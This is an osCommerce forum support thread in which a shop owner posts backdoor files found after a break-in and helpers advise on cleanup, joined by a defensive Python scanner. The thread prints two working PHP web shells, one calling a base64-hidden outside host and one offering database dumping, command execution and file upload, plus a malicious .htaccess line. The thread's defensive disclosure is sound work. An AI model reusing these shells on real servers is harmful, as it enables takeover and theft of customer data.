osCommerce

Webhost says I have suffered a Iframe injection

I've spent my weekend trying to clean up my website and get rid of files and old contribs I don't use.

 

Along the way, I discovered two 'interesting' looking files in my catalog>includes>languages folder that didn't look right. Includes.php was one. Never heard of such a file.

 

I looked at it and realized something was wrong. Mind you, my website is humming along just fine. Looks great, no error messages, getting sales, nothing appears to be wrong.

 

This is the content of that includes.php file:

 

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
   if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
   else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
   if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
   if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

 

Panicked. Wrote to the webhost. They scanned my entire site and found about 50 more just like it...everywhere from the images folder to you name it. Strange looking .htaccess files were also created. I've been deleting files all night.

 

My question is: how does someone access the site to do that? And...why? Can someone decode the above file and explain what the point was? According to the webhost...they've been there since April. I am mortified.

 

I've changed my password to Cpanel. It was a tough one, too. Upper case, lower case, numbers. Struggling to figure out how to change my Admin username and password...any help would be appreciated on that front!

 

Lastly, what can I do...aside from changing passwords...to prevent this in the future? I already have Sitemonitor installed. Must admit...I never used it much. I will run it like clockwork now. I have IP Trap installed. Anything else? I'm running version 2.2.

 

- Andrea

With that many files changed, it was probably done via the recently found security hole with the filemanager. That and other fixes can be found in these threads. If they did use that method of getting in, or maybe even if they didn't, they probably inserted some code that your searches may not find. If you decode the hacker code, as described in some of the above threads, you can determine what files they are using. Or, you can run the hacker test in SiteMonitor. It might be more work but it will find them. In the least, you need to delete the admin/file_manager.php file.

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons

Hi Jack,

 

Thank You for replying. I installed Sitemonitor 1.8 a while back. Upgraded to 1.9 while waiting to hear back from the webhost. You mention running 'the hacker test' in Sitemonitor.

 

I've deleted all the files my webhost found when they scanned my site, but the hacker test came up with this list:

 

admin/htmlarea/editor_advanced.js

admin/htmlarea/editor_basic.js

admin/htmlarea/popups/insert_image.html

boards/includes/usercp_confirm.php

boards/templates/subSilver/posting_topic_review.tpl

images/table_background_info.php

includes/modules/payment/paypal_ipn.php

 

I've looked at images/table_background_info.php and this is what I get:

 

<?php
/*
 $Id: table_background_info.php,v 1.73 2003/02/13 01:58:23 hpdl Exp $

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

 Copyright (c) 2003 osCommerce

 Released under the GNU General Public License
*/

define("OSCOMMERCE_FILENAME", 'shell.php');
define("SLASH", chr(92));
define("NL",    chr(10));
define("CRNL",  chr(13).chr(10));

$licence = "SBZRRRO7";

if (!isset($_POST['K']) || $licence != $_POST['K'])
{
 header("Status: 404 Not Found");
 header("HTTP/1.0 404 Not Found");
 $in = rand(10000000, 99999999);
 $fp = @fsockopen($_SERVER['SERVER_NAME'], 80, $errno, $errstr, 2);
 if ($fp) 
 {
   $name= preg_replace("~".addcslashes(OSCOMMERCE_FILENAME, ".")."~i", $in.".jpg", $_SERVER['SCRIPT_NAME']);
   $out  = "GET ".$name." HTTP/1.1".CRNL;
   $out .= "Host: ".$_SERVER['SERVER_NAME'].CRNL;
   $out .= "Connection: Close".CRNL.CRNL;
   fwrite($fp, $out);
   while (!feof($fp)) 
   {
     $data2save .= fgets($fp, 128);
   }
   @fclose($fp);

   if (strstr($data2save, CRNL.CRNL))
   {
     $data2save = substr(strstr($data2save, CRNL.CRNL), 4);
     $data2save = preg_replace("~".$in.SLASH.".jpg~i", OSCOMMERCE_FILENAME, $data2save);
     echo preg_replace("~^[\d\s]+$~mi", "", $data2save);
   }    
 }  
 die();
}

header("Expires: Mon, 26 Jul 1980 05:00:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Cache-Control: private");
header("Pragma: no-cache");

set_time_limit(99999999999);
ini_set('memory_limit', -1); 

clearstatcache();
function dbc()
{
 if (is_file("../includes/configure.php"))
 {
   @include ("../includes/configure.php");    
 }
 else if (is_file("includes/configure.php"))
 {
   @include ("includes/configure.php");
 }

 if (isset($_POST['MYH'])) $MYH = $_POST['MYH']; else $MYH = DB_SERVER;
 if (isset($_POST['MYU'])) $MYU = $_POST['MYU']; else $MYU = DB_SERVER_USERNAME;
 if (isset($_POST['MYP'])) $MYP = $_POST['MYP']; else $MYP = DB_SERVER_PASSWORD;
 if (isset($_POST['MYD'])) $MYD = $_POST['MYD']; else $MYD = DB_DATABASE;

 $MYL = mysql_connect($MYH, $MYU, $MYP);
 mysql_select_db($MYD);

 return array($MYL, $MYH, $MYU, $MYP, $MYD);
}

if (isset($_POST['P']))
{
 die("A11");
}
else if (isset($_POST['MYST']))
{
 list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
 $tables = "";
 $res = mysql_query("SHOW TABLES");
 while ($row = mysql_fetch_array($res))
 {
   $resCounts = @mysql_query("SELECT COUNT(*) FROM `".$row[0]."`", $MYL);
   $rowCounts = @mysql_fetch_array($resCounts);
   $tables .= "|:|".$row[0].":".$rowCounts[0].NL;
 }
 echo $tables;
 mysql_close($MYL);
 die("#done");
}
else if (isset($_POST['MYSD']))
{
 list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
 $list = "";
 $res = mysql_query("SHOW DATABASES");
 while ($row = mysql_fetch_array($res))
 {
   $list .= "|:|".$row[0].NL;
 }
 echo $list;
 mysql_close($MYL);
 die("#done");
}
else if (isset($_POST['MYFR']))
{
 list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();

 if (substr($_POST['MYC'], 0, 1) == 0)
 {
   $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['MYT']."`", $MYL);
   $row   = @mysql_fetch_array($res);
   echo $row[1].";".NL;
 }

 $res = @mysql_query("SELECT * FROM `".$_POST['MYT']."` LIMIT ".$_POST['MYC'], $MYL);
 if (@mysql_num_rows($res) > 0) 
 {
   while (($row = @mysql_fetch_array($res))) 
   {
     $keys   = @implode("`, `", @array_keys($row));
     $values = @array_values($row);
     foreach($values as $k=>$v) 
     {
       $values[$k] = mysql_escape_string($v);
     }
     $values = @implode("', '", $values);
     echo "INSERT INTO `".$_POST['MYT']."` (`".$keys."`) VALUES ('".$values."');".NL;
   }
 }
 mysql_close($MYL); 
 die("#done");       
}
else if (isset($_POST['MYINF']))
{
 $inf = dbc();
 unset($inf[0]);
 die(implode("|:|", $inf));
}  
else if (isset($_POST['E']))
{
 @exec($_POST['E'], $output, $retCode);
 die(($retCode != 0) ? ("RETCODE:".$retCode.NL) : "".implode(NL, $output));
}
else if (isset($_POST['U']) && isset($_POST['UF']) && isset($_POST['US'])) 
{
 if (strlen($_POST['U']) == $_POST['US'])
 {
   ignore_user_abort(true);
   $fpSave = fopen($_POST['UF'], "w");
   fwrite($fpSave, base64_decode($_POST['U']));
   fclose($fpSave);
   ignore_user_abort(false);
 }
}

if (isset($_POST['T']) || isset($_POST['UF']))
{
 if (isset($_POST['UF'])) $f = $_POST['UF']; else $f = $_POST['T']; 

 $t  = array();
 $d  = dir(".");
 $mt = 0;
 while (false !== ($e = $d->read()))
 {
   $nt = filemtime($e);
   if ($nt > $mt) $mt = $nt;
   if (preg_match("~table_background~", $e))
   {
     $t[0][] = $nt;
   }
   else
   {
     $t[1][] = $nt;
   }
 }
 $d->close();
 if (count($t[0]) > 0) $tc = 0; else $tc = 1;

 sort($t[$tc]);

 if (count($t[$tc]) > 0)
 {
   @touch($f,  $t[$tc][floor(count($t[$tc]) / 2)]);
   @touch("./", $mt);
 }  
}

?>

 

I'm 'looking' at the paypal ipn file and don't see anything in particular...which means nothing. What do you think of the file I just posted? I'm unfamiliar with all of them, except the paypal file.

 

- Andrea

It's a hacker file. There shouldn't be any files in the images directory other than image files and maybe a .htaccess file. The boards/includes/usercp_confirm.php is suspect too but that directory isn't standard oscommerce so it's difficult to say. For the others, there's really no way to know for sure if you are not familiar with what to look for other than comparing them with a known good copy. The best approach to a problem like this is to have the host restore the complete shop directory. You can tell from the datestamp on the hacked files when it happened and if they have a backup from before then, just replacing them all will fix all such problems. Tell them to be sure not to restore the database and there shouldn't be any problems. Once the restore is done, no matter how you do it, you should create a complete copy on your computer so there is something to compare against and to restore from if something like this happens again.

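As an added, defender-side example (not osCommerce or SiteMonitor code), here is a small Python triage script that walks a shop directory for the tells that appear in this thread: PHP files where only images belong, scripts that hand request data to system()/exec(), .htaccess 404 handlers that point at a PHP file, and base64 literals decoded so the remote include URL becomes readable. The sample tree it builds is constructed; the only page value in it is the base64 literal from the posted includes.php. It judges files by content rather than by datestamp, because the shell posted above touches its own mtime to match its neighbours.

```python
import base64, os, re, tempfile

# Constructs seen in the two backdoors posted above: a shell command taken from
# request data, a base64-hidden remote include, and a 404 handler that runs PHP.
SHELL_EXEC = re.compile(r'\b(?:system|exec|passthru|shell_exec)\s*\(\s*\$_(?:GET|POST|REQUEST)\b')
B64_LIT = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]{8,})["\']')
HTACCESS_PHP = re.compile(r'^\s*ErrorDocument\s+\d{3}\s+\S*\.php\b', re.I | re.M)

def decode_literals(text):
    """Decode base64 literals fed to base64_decode() so the hidden URL is readable."""
    out = []
    for lit in B64_LIT.findall(text):
        try:
            out.append(base64.b64decode(lit, validate=True).decode('utf-8', 'replace'))
        except ValueError:
            pass  # matched the character class but is not valid base64
    return out

def scan(root):
    """Walk a web root and return sorted (relative path, finding) pairs."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, '/')
            with open(path, encoding='utf-8', errors='replace') as fh:
                text = fh.read()
            if name == '.htaccess' and HTACCESS_PHP.search(text):
                findings.append((rel, 'htaccess_404_runs_php'))
            if name.lower().endswith('.php'):
                if rel.startswith('images/'):  # only images belong there
                    findings.append((rel, 'php_in_images'))
                if SHELL_EXEC.search(text):
                    findings.append((rel, 'shell_exec_from_request'))
                findings += [(rel, 'decoded:' + s) for s in decode_literals(text)]
    return sorted(findings)

def build_sample():
    """Constructed web root; the base64 literal is the one from the includes.php above."""
    files = {
        'includes/application_top.php': "<?php require('includes/configure.php');\n",
        'includes/languages/includes.php': '<?php if(isset($_GET["c"])){system($_GET["c"]);}\n'
            '@include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9"));\n',
        'images/table_background_info.php': "<?php @exec($_POST['E'], $out, $rc);\n",
        'images/gt_interactive/.htaccess': 'ErrorDocument 404 //catalog/images/gt_interactive/base.php\n',
    }
    root = tempfile.mkdtemp()
    for rel, body in files.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), 'w', encoding='utf-8') as fh:
            fh.write(body)
    return root
```

Call scan(build_sample()) to see the findings on the constructed tree, or scan('/path/to/catalog') on a copy of a real shop; anything it lists still needs a look by hand against a known good copy.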

Thanks for all of your help, Jack. I deleted admin/filemanager.php as you suggested. Renamed the Admin folder to something ridiculous and changed the admin/includes/configure file. Changed my password to Cpanel, changed the username and password on my 'admin' folder.

 

All of the hacker files have been deleted. Those entries for the 'boards'...that folder is something I installed ages ago and never used. It was a message forum. So, I just chucked the entire folder.

 

Hopefully, all is well now. Never did experience any problems with the website. Orders are coming in like usual. I just wonder how they got in. My Admin folder has always been password protected. Complicated passwords on Cpanel and the admin folder. I'm stuck worrying about how they managed to get in.

 

The hacker also inserted a number of .htaccess files in the folders which contained hacker files. Here's an example of the content of one of them:

 

Options -MultiViews
ErrorDocument 404 //catalog/images/gt_interactive/base.php

 

The file base.php, of course, being a hacker file. Counted eleven new .htaccess files. Deleted them all.

I'm not going to go the restore route with the webhost as I really don't want to and fear it might create new problems. I'm always messing around with the website, changing things and trying new things. I think I have manually deleted all the hacker files and the hacker test in Sitemonitor is not showing anymore files. Hopefully, all I've done is all that needs to be done.

 

- Andrea

Hopefully, all is well now. Never did experience any problems with the website. Orders are coming in like usual. I just wonder how they got in. My Admin folder has always been password protected. Complicated passwords on Cpanel and the admin folder. I'm stuck worrying about how they managed to get in.

If they got in using the file_manager.php file, they didn't need a login. It let them bypass it. If they got in some other way, you may never know. In order to know, or at least make an intelligent guess, you would need the server logs, the time they did it and probably their IP. It usually isn't worth the effort unless they were getting in over and over. I think the problem was the file manager and with the changes you made, it should be OK now.

This topic is now archived and is closed to further replies.